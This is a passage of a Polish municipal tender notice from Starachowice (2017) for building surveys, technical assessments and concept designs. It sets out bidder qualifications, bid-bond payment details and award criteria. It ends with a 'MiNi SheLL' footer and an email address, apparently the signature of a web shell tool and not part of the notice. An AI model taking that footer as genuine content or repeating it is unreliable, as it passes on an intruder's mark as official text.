miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w
pkt 7.3) lit. e) SIWZ, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze
wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument
miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem
samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania
Wykonawcy lub miejsce zamieszkania tej osoby. Zastąpione dokumenty winny być wystawione odpowiednio
jak w pkt 7.3) lit. e) SIWZ.


</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />a) wykazu usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w
okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w
postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich
wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz
załączeniem dowodów określających czy usługi zostały wykonane lub są wykonywane należycie, przy czym
dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego
usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z
uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów 
oświadczenie Wykonawcy w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje
bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3
miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu 
sporządzonego wg załącznika ­ DOŚWIADCZENIE ZAWODOWE. Część III ­ wymagane jest wykazanie
wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia
działalności jest krótszy  w tym okresie należycie co najmniej: dwóch usług, z których każda obejmowała
wykonanie ekspertyzy technicznej dla budowy, przebudowy lub remontu budynku o kubaturze nie mniejszej
niż 500 m3 . W przypadku składania oferty przez Wykonawców występujących wspólnie wyżej wymieniony
warunek mogą spełniać łącznie. Część IV  wymagane jest wykazanie wykonanych w okresie ostatnich trzech
lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie
należycie co najmniej: dwóch usług, z których każda obejmowała wykonanie ekspertyzy technicznej dla
budowy, przebudowy lub remontu budynku o kubaturze nie mniejszej niż 500 m3 . W przypadku składania
oferty przez Wykonawców występujących wspólnie wyżej wymieniony warunek mogą spełniać łącznie. Do
wykazu należy załączyć dowody określające czy te usługi zostały wykonane lub są wykonywane należycie.
Dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego
usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z
uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów 
oświadczenie wykonawcy w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje
bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3
miesiące przed upływem terminu składania ofert. b) wykazu osób, skierowanych przez Wykonawcę do
realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości
lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych,
uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także
zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami 
WYKAZ OSÓB. Część III ­ wymagane jest dysponowanie osobami o odpowiednich kwalifikacjach
zawodowych, doświadczeniu i wykształceniu niezbędnym do wykonania przedmiotu zamówienia tj. wymagane
jest dysponowanie: jedną osobą, która pełnić będzie funkcję kierownika zespołu projektowego, posiadającą
następujące kwalifikacje: doświadczenie w sporządzaniu co najmniej 1 dokumentacji projektowej obejmującej
wykonanie ekspertyzy technicznej dla budowy, przebudowy lub remontu budynku o kubaturze nie mniejszej
niż 500 m3 , stosowne uprawnienia budowlane do projektowania, które uprawniają do pełnienia samodzielnej
funkcji technicznej projektanta w specjalności konstrukcyjno ­ budowlanej bez ograniczeń lub
architektonicznej bez ograniczeń w zakresie niezbędnym do realizacji przedmiotu zamówienia, które zostały
wydane na podstawie aktualnie obowiązujących przepisów lub odpowiadające im uprawnienia wydane na
podstawie wcześniej obowiązujących przepisów prawa. W przypadku składania oferty przez Wykonawców
występujących wspólnie wyżej wymieniony warunek musi spełnić co najmniej jeden z Wykonawców. Część IV
­ wymagane jest dysponowanie osobami o odpowiednich kwalifikacjach zawodowych, doświadczeniu i
wykształceniu niezbędnym do wykonania przedmiotu zamówienia tj. wymagane jest dysponowanie: jedną
osobą, która pełnić będzie funkcję kierownika zespołu projektowego, posiadającą następujące kwalifikacje:
doświadczenie w sporządzaniu co najmniej 1 dokumentacji projektowej obejmującej wykonanie ekspertyzy
technicznej dla budowy, przebudowy lub remontu budynku o kubaturze nie mniejszej niż 500 m3 , stosowne
uprawnienia budowlane do projektowania, które uprawniają do pełnienia samodzielnej funkcji technicznej
projektanta w specjalności konstrukcyjno ­ budowlanej bez ograniczeń lub architektonicznej bez ograniczeń w
zakresie niezbędnym do realizacji przedmiotu zamówienia, które zostały wydane na podstawie aktualnie
obowiązujących przepisów lub odpowiadające im uprawnienia wydane na podstawie wcześniej
obowiązujących przepisów prawa. W przypadku składania oferty przez Wykonawców występujących wspólnie
wyżej wymieniony warunek musi spełnić co najmniej jeden z Wykonawców. Wskazane powyżej uprawnienia
budowlane muszą być zgodne z ustawą dnia 7 lipca 1994 r. Prawo budowlane oraz rozporządzeniem Ministra
Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w
budownictwie lub odpowiadającym im ważnym uprawnieniom budowlanym, wydanym na podstawie
uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów obowiązujących na terenie kraju, z
którego pochodzi dana osoba, które w zakresie objętym zamówieniem pozwalać będą na pełnienie
samodzielnych funkcji technicznych w budownictwie w ww. specjalności. Wykonawca nie jest obowiązany do
złożenia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 pkt 1 i
3 ustawy Pzp, jeżeli Zamawiający posiada oświadczenia lub dokumenty dotyczące tego Wykonawcy lub może
je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w
rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania
publiczne. Wykonawca podaje te informacje w oświadczeniu znajdującym się w formularzu OFERTA. Jeżeli
Wykonawca polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej
innych podmiotów Zamawiający żąda od Wykonawcy przedstawienia do oferty w oryginale zobowiązania tych
podmiotów do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia zawierającego
m. in. następujące informacje: zakres dostępnych Wykonawcy zasobów innego podmiotu sposób
wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia publicznego
zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego czy podmiot, na
zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących
wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których
wskazane zdolności dotyczą.


<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br />nie dotyczy</div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">nie dotyczy</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Oferta na części III i IV winna zawierać co najmniej: wypełnione formularze OFERTA wraz z wyceną na
poszczególne części zamówienia, wypełnione formularze oświadczeń  załączniki nr 2 i 3 na poszczególne
części zamówienia, pełnomocnictwo do reprezentowania Wykonawcy o ile ofertę składa pełnomocnik
(oryginał lub kopia poświadczona notarialnie), dokument ustanawiający pełnomocnika (zgodnie z pkt 12 ppkt
11 SIWZ), pisemne zobowiązanie podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na
potrzeby wykonania zamówienia (tylko, jeśli dotyczy), potwierdzenie wniesienia wadium (zgodnie z pkt 10
SIWZ) na poszczególne części zamówienia.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Wadium może być wnoszone w jednej lub kilku następujących formach: pieniądzu (tylko przelewem na niżej
wymienione konto bankowe Zamawiającego), poręczeniach bankowych, lub poręczeniach spółdzielczej kasy
oszczędnościowo­kredytowej, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach
udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o
utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. j. Dz. U. z 2016 r., poz. 359). UWAGA! W
przypadku, gdy Wykonawca składa ofertę na wiele części zamówienia wadium należy wnieść osobno na
poszczególne części zamówienia. Wadium dla cz. III w wysokości: 1.000,00 zł należy wnieść: 1) w pieniądzu
­ przelewem na konto nr 97 1560 0013 2851 9704 3000 0013 Getin Noble Bank Spółka Akcyjna tytułem:
WADIUM na przetarg Wykonanie opracowań przedprojektowych w ramach zadania Starachowice OD nowa
Cz. III ­ z takim wyliczeniem, aby wpłynęło na rachunek Zamawiającego najpóźniej w terminie złożenia oferty
(wniesienie wadium przelewem oznacza uznanie kwoty wadium przez rachunek Zamawiającego) 2) w innych
formach  w terminie składania oferty. Oryginał dokumentu zdeponować w kasie (w kopercie zaadresowanej
na Urząd Miejski, Kasa ul. Radomska 45, 27­200 Starachowice, z dopiskiem WADIUM na przetarg Wykonanie
opracowań przedprojektowych w ramach zadania Starachowice OD nowa Cz. III, kopię dokumentu dołączyć
do oferty). Wadium dla cz. IV w wysokości: 600,00 zł należy wnieść: 1) w pieniądzu ­ przelewem na konto nr
97 1560 0013 2851 9704 3000 0013 Getin Noble Bank Spółka Akcyjna tytułem: WADIUM na przetarg
Wykonanie opracowań przedprojektowych w ramach zadania Starachowice OD nowa Cz. IV ­ z takim
wyliczeniem, aby wpłynęło na rachunek Zamawiającego najpóźniej w terminie złożenia oferty (wniesienie
wadium przelewem oznacza uznanie kwoty wadium przez rachunek Zamawiającego) 2) w innych formach 
w terminie składania oferty. Oryginał dokumentu zdeponować w kasie (w kopercie zaadresowanej na Urząd Miejski, Kasa ul. Radomska 45, 27­200 Starachowice, z dopiskiem WADIUM na przetarg Wykonanie
opracowań przedprojektowych w ramach zadania Starachowice OD nowa Cz. IV, kopię dokumentu dołączyć
do oferty). Potwierdzone przez Wykonawcę za zgodność z oryginałem kopie przelewów oraz kopie
dokumentów dotyczących innych niż w pieniądzu form wadium, należy dołączyć do oferty najpóźniej w
terminie jej składania. Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób
nieprawidłowy zostanie odrzucona w postępowaniu.</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br />nie dotyczy</div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br />nie dotyczy</div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br />nie dotyczy<br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br />nie dotyczy<br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b>nie dotyczy<br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              nie dotyczy<br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              nie dotyczy<br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              nie dotyczy<br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              nie dotyczy<br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              nie dotyczy<br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br />nie dotyczy</div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ofertowa</td><td>60.00</td></tr><tr><td>doświadczenie kierownika zespołu projektowego</td><td>30.00</td></tr><tr><td>wysokość kary umownej z tytułu zwłoki w wykonaniu przedmiotu zamówienia</td><td>10.00</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br />nie dotyczy<br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br />nie dotyczy<br />
              Informacje dodatkowe
              <br />nie dotyczy<br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br />nie dotyczy<br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br />nie dotyczy<br />
              Wstępny harmonogram postępowania:
              <br />nie dotyczy<br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br />nie dotyczy<br /><br />
              Informacje dodatkowe:
              <br />nie dotyczy<br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br />nie dotyczy<br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br />nie dotyczy<br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px">nie dotyczy</div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px">nie dotyczy</div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px">nie dotyczy</div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px">Projekt umowy stanowi załącznik do SIWZ</div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px">nie dotyczy</div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Dopuszcza się nw. zmiany postanowień zawartej umowy, które nie mogą prowadzić do zmiany charakteru
umowy: 1. zmiany części zamówienia, którą wykonują podwykonawcy, 2. wprowadzenia podwykonawcy, w
przypadku braku możliwości wykonania silami własnymi za wiedzą Zamawiającego, 3. zmiany zasad finansowania
zamówienia  w przypadku uzyskania / nieuzyskania dofinansowania ze źródeł zewnętrznych, 4. zmiany terminu
wykonania przedmiotu zamówienia na pisemny wniosek Wykonawcy lub przez Zamawiającego, w razie
wystąpienia jednej z następujących okoliczności: a) działania siły wyższej, za które uważa się zdarzenia o
charakterze nadzwyczajnym, występujące po zawarciu umowy, a których Strony nie były w stanie przewidzieć
w momencie jej zawierania i których zaistnienie lub skutki uniemożliwiają wykonanie przedmiotu umowy w
sposób należyty w określonym umownie terminie, b) zmian prawa o charakterze bezwzględnie obowiązującym ­
powodujących konieczność wydłużenia procesu projektowania (dodatkowe czynności prawne i faktyczne
nakazane prawem nie występujące w dacie zawarcia umowy chyba, że ww. zmiany prawa winny być znane
stronom w sytuacji odłożonego ich wejścia w życie), c) w przypadku należytego i terminowego wystąpienia
Wykonawcy lub Zamawiającego o uzgodnienie, o wydanie decyzji administracyjnej, warunków technicznych lub
innego dokumentu niezbędnego do prawidłowej realizacji zamówienia, jeżeli organ administracji publicznej lub
inna upoważniona instytucja / osoba nie wydała stosownego dokumentu lub decyzji w terminie przewidzianym
dla danej czynności, d) wykonania dodatkowych usług, mających wpływ na termin wykonania zamówienia
podstawowego. W przypadku wystąpienia którejkolwiek z ww. okoliczności wymienionych termin wykonania
umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w
sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br />nie dotyczy<br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br />nie dotyczy<br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 07/04/2017, godzina: 10:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br />nie dotyczy<br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
               Oferta winna być sporządzona w języku polskim<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />nie dotyczy</div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Opracowanie: inwentaryzacji budowlanych, ekspertyz technicznych i audytów dla 4 budynków mieszkalnych: nr 2 i nr 10 przy ulicy Robotniczej, nr 12 i nr 14 przy ulicy Widok (z uwzględnieniem przebudowy pomieszczeń będących komórkami lokatorskimi)<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest
wykonanie opracowań przedprojektowych: część III Opracowanie: inwentaryzacji budowlanych, ekspertyz
technicznych i audytów dla 4 budynków mieszkalnych: nr 2 i nr 10 przy ulicy Robotniczej, nr 12 i nr 14 przy
ulicy Widok (z uwzględnieniem przebudowy pomieszczeń będących komórkami lokatorskimi) budynek nr 2 przy
ul. Robotniczej  pow. użytkowa  255 m2, kubatura  ok. 892 m3, 10 lokali, budynek nr 10 przy ul.
Robotniczej  pow. użytkowa  192 m2, kubatura  ok. 672 m3, 6 lokali, budynek nr 12 przy ul. Widok  pow.
użytkowa  342 m2, kubatura  ok. 1197 m3, 14 lokali, budynek nr 14 przy ul. Widok  pow. użytkowa  189
m2, kubatura  ok. 662 m3, 6 lokali.Zamówienie jest finansowane ze środków Unii Europejskiej Projekt:
Starachowice OD nowa POPT 2014 ­ 2020. Zamawiający umożliwi Wykonawcom, w celu przygotowania się do
złożenia i prawidłowego sporządzenia ofert, przeprowadzenie wizji lokalnej dla zapoznania się z terenem, na
którym realizowany będzie przedmiot zamówienia. Zamawiający wymaga, adekwatnie do przedmiotu zamówienia,
dostosowania projektu do potrzeb wszystkich użytkowników, w tym zapewnienia dostępności dla osób
niepełnosprawnych. Ze względu na charakter czynności objętych zamówieniem Zamawiający nie wymaga
zatrudniania osób biorących udział w realizacji zamówienia na podstawie umowy o pracę. Szczegółowy opis
przedmiotu zamówienia na poszczególne części zamówienia zawiera załącznik nr 1 do Specyfikacji istotnych
warunków zamówienia (zwana dalej SIWZ).<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/07/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ofertowa</td><td>60.00</td></tr><tr><td>doświadczenie kierownika zespołu projektowego</td><td>30.00</td></tr><tr><td>wysokość kary umownej z tytułu zwłoki w wykonaniu przedmiotu zamówienia</td><td>10.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Opracowanie: inwentaryzacji architektonicznych, oceny stanu technicznego dla 4 budynków gospodarczych przy ulicy Robotniczej i ulicy Widok oraz koncepcji budowy budynku użyteczności publicznej i 3 budynków mieszkalnych w miejscu usytuowania istniejących budynków gospodarczych.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>:Przedmiotem zamówienia jest
wykonanie opracowań przedprojektowych: część IV Opracowanie: inwentaryzacji architektonicznych, oceny
stanu technicznego dla 4 budynków gospodarczych przy ulicy Robotniczej i ulicy Widok oraz koncepcji budowy
budynku użyteczności publicznej i 3 budynków mieszkalnych w miejscu usytuowania istniejących budynków
gospodarczych budynek gospodarczy przy budynkach mieszkalnych ul. Widok nr 8 i nr 10 ­ pow. około 160
m2 , budynek gospodarczy przy budynku mieszkalnym ul. Widok nr 12 ­ pow. około 150 m2 , budynek
gospodarczy przy budynku mieszkalnym ul. Robotnicza nr 14 ­ pow. około 120 m2 , budynek gospodarczy przy
budynku mieszkalnym ul. Robotnicza nr 4 ­ pow. około 90 m2 Zamówienie jest finansowane ze środków Unii
Europejskiej Projekt: Starachowice OD nowa POPT 2014 ­ 2020. Zamawiający umożliwi Wykonawcom, w celu
przygotowania się do złożenia i prawidłowego sporządzenia ofert, przeprowadzenie wizji lokalnej dla zapoznania
się z terenem, na którym realizowany będzie przedmiot zamówienia. Zamawiający wymaga, adekwatnie do
przedmiotu zamówienia, dostosowania projektu do potrzeb wszystkich użytkowników, w tym zapewnienia
dostępności dla osób niepełnosprawnych. Ze względu na charakter czynności objętych zamówieniem
Zamawiający nie wymaga zatrudniania osób biorących udział w realizacji zamówienia na podstawie umowy o
pracę. Szczegółowy opis przedmiotu zamówienia na poszczególne części zamówienia zawiera załącznik nr 1 do
Specyfikacji istotnych warunków zamówienia (zwana dalej SIWZ).<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/07/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ofertowa</td><td>60.00</td></tr><tr><td>doświadczenie kierownika zespołu projektowego</td><td>30.00</td></tr><tr><td>wysokość kary umownej z tytułu zwłoki w wykonaniu przedmiotu zamówienia </td><td>10.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com